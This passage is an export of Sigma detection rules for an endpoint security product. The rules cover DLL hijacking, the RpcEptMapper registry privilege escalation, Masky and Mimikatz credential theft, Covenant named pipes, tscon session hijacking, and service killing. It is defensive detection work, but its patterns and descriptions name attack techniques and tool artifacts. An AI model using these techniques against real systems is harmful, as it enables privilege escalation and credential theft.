'?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ef941845-bc17-47b0-ad9a-b00bef1d37b2",
"rule_name": "DLL Hijacking via diskraid.exe",
"rule_description": "Detects potential Windows DLL Hijacking via diskraid.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "efc62da6-bd3f-4a4e-9396-c110c97ca805",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626371Z",
"creation_date": "2026-03-23T11:45:34.626373Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626378Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://itm4n.github.io/windows-registry-rpceptmapper-eop/",
"https://blog.0patch.com/2020/11/0day-in-windows-7-and-server-2008-r2.html",
"https://attack.mitre.org/techniques/T1574/011/"
],
"name": "t1574_011_registry_services_insecure_permission_performance.yml",
"content": "title: RpcEptMapper Insecure Permissions Exploited\nid: efc62da6-bd3f-4a4e-9396-c110c97ca805\ndescription: |\n Detects the exploitation of the Windows RpcEptMapper Service Insecure Registry Permissions vulnerability.\n This is an Elevation of Privilege (EoP) flaw that arises from improper permissions set on certain Windows registry keys associated with the RpcEptMapper (RPC Endpoint Mapper) service.\n This rule detects when a value is written under the Performance subkey in Dnscache or RpcEptMapper (insecure registry keys in win7 / 2008 R2).\n It is recommended to investigate the registry modification to determine its legitimacy and the process making the registry modification for other suspicious behavior.\nreferences:\n - https://itm4n.github.io/windows-registry-rpceptmapper-eop/\n - https://blog.0patch.com/2020/11/0day-in-windows-7-and-server-2008-r2.html\n - https://attack.mitre.org/techniques/T1574/011/\ndate: 2020/11/27\nmodified: 2025/03/07\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.011\n - attack.defense_evasion\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Exploit.RpcEptMapper\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_set:\n EventType: 'SetValue'\n TargetObject:\n - '*\\Services\\Dnscache\\Performance\\\\*'\n - '*\\Services\\RpcEptMapper\\Performance\\\\*'\n\n filter_empty:\n Details: '(Empty)'\n\n selection_rename:\n EventType: 'RenameKey'\n NewName:\n - '*\\Services\\Dnscache\\Performance\\\\*'\n - '*\\Services\\RpcEptMapper\\Performance\\\\*'\n\n exclusion_dword:\n Details: 'DWORD (0x????????)'\n\n exclusion_performance:\n TargetObject: '*\\Services\\\\*\\Performance\\Disable Performance Counters'\n\n condition: ((selection_set and not filter_empty) or selection_rename) and not 1 of 
exclusion_*\nlevel: high\n# level: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "efc62da6-bd3f-4a4e-9396-c110c97ca805",
"rule_name": "RpcEptMapper Insecure Permissions Exploited",
"rule_description": "Detects the exploitation of the Windows RpcEptMapper Service Insecure Registry Permissions vulnerability.\nThis is an Elevation of Privilege (EoP) flaw that arises from improper permissions set on certain Windows registry keys associated with the RpcEptMapper (RPC Endpoint Mapper) service.\nThis rule detects when a value is written under the Performance subkey in Dnscache or RpcEptMapper (insecure registry keys in win7 / 2008 R2).\nIt is recommended to investigate the registry modification to determine its legitimacy and the process making the registry modification for other suspicious behavior.\n",
"rule_creation_date": "2020-11-27",
"rule_modified_date": "2025-03-07",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1574.011"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "efc91ffa-0729-42e4-9e4d-f33d607c09e4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074343Z",
"creation_date": "2026-03-23T11:45:34.074345Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074350Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://z4ksec.github.io/posts/masky-release-v0.0.3/",
"https://github.com/Z4kSec/Masky",
"https://attack.mitre.org/techniques/T1003/"
],
"name": "t1003_masky_malicious_tool_execution.yml",
"content": "title: Masky Execution\nid: efc91ffa-0729-42e4-9e4d-f33d607c09e4\ndescription: |\n Detects an execution of Masky.\n Masky is an offensive open-source tool used to remotely dump domain users' credentials exploiting an ADCS (Active Directory Certificate Services) server.\n It is recommended to investigate the activity surrounding this action to determine its maliciousness and to verify that this is not part of an active security audit in your organization.\nreferences:\n - https://z4ksec.github.io/posts/masky-release-v0.0.3/\n - https://github.com/Z4kSec/Masky\n - https://attack.mitre.org/techniques/T1003/\ndate: 2022/09/12\nmodified: 2025/04/17\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.Masky\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\Masky.exe'\n - OriginalFileName: 'Masky.exe'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "efc91ffa-0729-42e4-9e4d-f33d607c09e4",
"rule_name": "Masky Execution",
"rule_description": "Detects an execution of Masky.\nMasky is an offensive open-source tool used to remotely dump domain users' credentials exploiting an ADCS (Active Directory Certificate Services) server.\nIt is recommended to investigate the activity surrounding this action to determine its maliciousness and to verify that this is not part of an active security audit in your organization.\n",
"rule_creation_date": "2022-09-12",
"rule_modified_date": "2025-04-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "efd4b774-b093-4772-891d-c34efe568c6e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098892Z",
"creation_date": "2026-03-23T11:45:34.098894Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098898Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lab52.io/blog/dll-side-loading-through-iobit-against-colombia/",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_iobit.yml",
"content": "title: DLL Hijacking via IObit\nid: efd4b774-b093-4772-891d-c34efe568c6e\ndescription: |\n Detects a potential Windows DLL hijacking via the IObit software.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to check the loaded DLL for malicious content as well as to investigate the behavior of the IOBit process.\nreferences:\n - https://lab52.io/blog/dll-side-loading-through-iobit-against-colombia/\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2024/12/12\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName:\n - 'RttHlp.exe'\n - 'IUService.exe'\n ProcessSignature: 'IObit CO., LTD'\n ImageLoaded|endswith:\n - '\\Register.dll'\n - '\\rtl120.bpl'\n - '\\vcl120.bpl'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\IObit\\Driver Booster\\'\n - '?:\\Program Files (x86)\\IObit\\IObit Uninstaller\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files (x86)\\IObit\\Driver Booster\\'\n - '?:\\Program Files (x86)\\IObit\\IObit Uninstaller\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature|contains: 'IObit CO., LTD'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "efd4b774-b093-4772-891d-c34efe568c6e",
"rule_name": "DLL Hijacking via IObit",
"rule_description": "Detects a potential Windows DLL hijacking via the IObit software.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to check the loaded DLL for malicious content as well as to investigate the behavior of the IOBit process.\n",
"rule_creation_date": "2024-12-12",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f0169aef-cb6b-4325-8927-9e651b5892c9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084903Z",
"creation_date": "2026-03-23T11:45:34.084905Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084910Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://posts.specterops.io/mimidrv-in-depth-4d273d19e148",
"https://attack.mitre.org/techniques/T1569/002",
"https://attack.mitre.org/software/S0002"
],
"name": "t1569_002_mimikatz_driver_loaded.yml",
"content": "title: Mimikatz Driver Registry Values Set\nid: f0169aef-cb6b-4325-8927-9e651b5892c9\ndescription: |\n Detects when Mimikatz driver service \"mimidrv\" values are set in the registry.\n This may be indicative of the Mimikatz driver being loaded.\n Mimikatz is a popular offensive security tool used for credential acquisition and lateral movement on an Active Directory endpoint.\n It is recommended to investigate the activity surrounding this action to determine its maliciousness and to verify that this is not part of an active security audit in your organization.\nreferences:\n - https://posts.specterops.io/mimidrv-in-depth-4d273d19e148\n - https://attack.mitre.org/techniques/T1569/002\n - https://attack.mitre.org/software/S0002\ndate: 2021/05/06\nmodified: 2025/02/19\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1569.002\n - attack.s0002\n - classification.Windows.Source.Registry\n - classification.Windows.HackTool.Mimikatz\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_service_start:\n EventType: 'SetValue'\n TargetObject|startswith: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\mimidrv\\Start'\n Details: 'DWORD (0x00000002)' # SERVICE_AUTO_START\n\n selection_service_image:\n EventType: 'SetValue'\n TargetObject|startswith: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\mimidrv\\ImagePath'\n\n filter_empty:\n Details:\n - '(Empty)'\n - ''\n\n condition: 1 of selection_* and not 1 of filter_*\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f0169aef-cb6b-4325-8927-9e651b5892c9",
"rule_name": "Mimikatz Driver Registry Values Set",
"rule_description": "Detects when Mimikatz driver service \"mimidrv\" values are set in the registry.\nThis may be indicative of the Mimikatz driver being loaded.\nMimikatz is a popular offensive security tool used for credential acquisition and lateral movement on an Active Directory endpoint.\nIt is recommended to investigate the activity surrounding this action to determine its maliciousness and to verify that this is not part of an active security audit in your organization.\n",
"rule_creation_date": "2021-05-06",
"rule_modified_date": "2025-02-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1569.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f01e4279-308b-48e6-ba7f-f31399d641ac",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097052Z",
"creation_date": "2026-03-23T11:45:34.097054Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097058Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dsmod.yml",
"content": "title: DLL Hijacking via dsmod.exe\nid: f01e4279-308b-48e6-ba7f-f31399d641ac\ndescription: |\n Detects potential Windows DLL Hijacking via dsmod.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dsmod.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\activeds.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f01e4279-308b-48e6-ba7f-f31399d641ac",
"rule_name": "DLL Hijacking via dsmod.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dsmod.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f041c41b-593e-43a7-8b24-6ea4c1365e46",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072755Z",
"creation_date": "2026-03-23T11:45:34.072757Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072761Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://riccardoancarani.github.io/2019-10-19-hunting-covenant-msbuild/",
"https://attack.mitre.org/techniques/T1021/002/"
],
"name": "t1021_002_default_covenant_named_pipes_creation.yml",
"content": "title: Default Covenant Named Pipe Created\nid: f041c41b-593e-43a7-8b24-6ea4c1365e46\ndescription: |\n Detects the creation of a named pipe pertaining to Covenant.\n Covenant uses Named Pipes mainly to self-replicate using SMB.\n It is recommended to analyze the process responsible for the named pipe creation to determine its legitimacy and to look for subsequent malicious actions executed on the host.\nreferences:\n - https://riccardoancarani.github.io/2019-10-19-hunting-covenant-msbuild/\n - https://attack.mitre.org/techniques/T1021/002/\ndate: 2022/07/08\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.002\n - attack.execution\n - attack.t1559\n - classification.Windows.Source.NamedPipe\n - classification.Windows.Framework.Covenant\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n category: named_pipe_creation\ndetection:\n selection:\n # Endswith here allows us to match pipes that are prefixed\n # with hosts\n PipeName|endswith: '\\gruntsvc'\n\n condition: selection\nlevel: high\n# level: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f041c41b-593e-43a7-8b24-6ea4c1365e46",
"rule_name": "Default Covenant Named Pipe Created",
"rule_description": "Detects the creation of a named pipe pertaining to Covenant.\nCovenant uses Named Pipes mainly to self-replicate using SMB.\nIt is recommended to analyze the process responsible for the named pipe creation to determine its legitimacy and to look for subsequent malicious actions executed on the host.\n",
"rule_creation_date": "2022-07-08",
"rule_modified_date": "2025-04-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.002",
"attack.t1559"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f0a84a5f-a25c-4af2-b09a-10fced00686a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626044Z",
"creation_date": "2026-03-23T11:45:34.626046Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626050Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.ired.team/offensive-security/lateral-movement/t1076-rdp-hijacking-for-lateral-movement",
"https://blog.gentilkiwi.com/securite/vol-de-session-rdp",
"https://attack.mitre.org/techniques/T1563/002/"
],
"name": "t1563_002_tscon_session_hijacking.yml",
"content": "title: Possible Session Hijacking via Tscon\nid: f0a84a5f-a25c-4af2-b09a-10fced00686a\ndescription: |\n This rule detects the usage of the tscon.exe utility from the \"NT AUTHORITY\\SYSTEM\" user. Terminal Services Console (tscon) is used to connect to another session on a Remote Desktop Session Host server.\n With System permissions, an attacker can hijack a session without the need for credentials or prompts to the user. This can be done locally or remotely.\n To investigate this alert, look for the usage of qwinsta or quser as a way to discover remote RDP sessions. HarfangLab EDR provides alerts when these binaries are used for discovery.\n It also recommended to attempt to correlate RDP logins across machines to determine if the tool was used successfully.\n Steps to reproduce this along with an investigation guide are present in the references.\nreferences:\n - https://www.ired.team/offensive-security/lateral-movement/t1076-rdp-hijacking-for-lateral-movement\n - https://blog.gentilkiwi.com/securite/vol-de-session-rdp\n - https://attack.mitre.org/techniques/T1563/002/\ndate: 2023/08/25\nmodified: 2026/01/05\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1563.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.Tscon\n - classification.Windows.Behavior.Hijacking\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'tscon.exe'\n UserSID|startswith: 'S-1-5-18'\n\n exclusion_appdis:\n ParentImage|endswith:\n - '\\Systancia\\AppliDis\\AppliDis Serveur\\bin\\AppliDis Starter.exe'\n - '\\Systancia\\AppliDis\\AppliDis Serveur\\bin\\ThinDesktop\\adisbureau.exe'\n\n exclusion_opentext:\n ParentImage: '?:\\Program Files (x86)\\OpenText\\Functional Testing\\bin\\HP.UFT.HelperService.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f0a84a5f-a25c-4af2-b09a-10fced00686a",
"rule_name": "Possible Session Hijacking via Tscon",
"rule_description": "This rule detects the usage of the tscon.exe utility from the \"NT AUTHORITY\\SYSTEM\" user. Terminal Services Console (tscon) is used to connect to another session on a Remote Desktop Session Host server.\nWith System permissions, an attacker can hijack a session without the need for credentials or prompts to the user. This can be done locally or remotely.\nTo investigate this alert, look for the usage of qwinsta or quser as a way to discover remote RDP sessions. HarfangLab EDR provides alerts when these binaries are used for discovery.\nIt also recommended to attempt to correlate RDP logins across machines to determine if the tool was used successfully.\nSteps to reproduce this along with an investigation guide are present in the references.\n",
"rule_creation_date": "2023-08-25",
"rule_modified_date": "2026-01-05",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1563.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f0acccd3-038d-40db-a283-4ac1f2180038",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.089712Z",
"creation_date": "2026-03-23T11:45:34.089714Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089719Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1489/",
"https://attack.mitre.org/techniques/T1569/",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1489_service_killed.yml",
"content": "title: System Service Killed via Pkill\nid: f0acccd3-038d-40db-a283-4ac1f2180038\ndescription: |\n Detects when an important service is manually killed using pkill.\n Adversaries may kill services on a system to render these services unavailable to legitimate users or to impair the security tools already installed.\n It is recommended to ensure that both a legitimate administrator disabled this service and that the service is not critical.\nreferences:\n - https://attack.mitre.org/techniques/T1489/\n - https://attack.mitre.org/techniques/T1569/\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2023/12/15\nmodified: 2025/02/18\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1489\n - attack.execution\n - attack.t1569\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.ServiceStop\n - classification.Linux.Behavior.ImpairDefenses\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_pkill:\n Image|endswith: '/pgrep'\n CommandLine|contains: 'pkill '\n\n selection_service:\n CommandLine|contains:\n - ' cron' # and crond\n - ' cupsd'\n - ' sshd'\n - ' syslog'\n - ' rsyslog'\n - ' systemd-journald'\n\n exclusion_logrotate:\n ProcessCommandLine: 'pkill -HUP rsyslog'\n GrandparentImage: '/usr/sbin/logrotate'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f0acccd3-038d-40db-a283-4ac1f2180038",
"rule_name": "System Service Killed via Pkill",
"rule_description": "Detects when an important service is manually killed using pkill.\nAdversaries may kill services on a system to render these services unavailable to legitimate users or to impair the security tools already installed.\nIt is recommended to ensure that both a legitimate administrator disabled this service and that the service is not critical.\n",
"rule_creation_date": "2023-12-15",
"rule_modified_date": "2025-02-18",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution",
"attack.impact"
],
"rule_technique_tags": [
"attack.t1489",
"attack.t1562.001",
"attack.t1569"
],
"warnings": null,
"errors": null,
"declared_in": null,
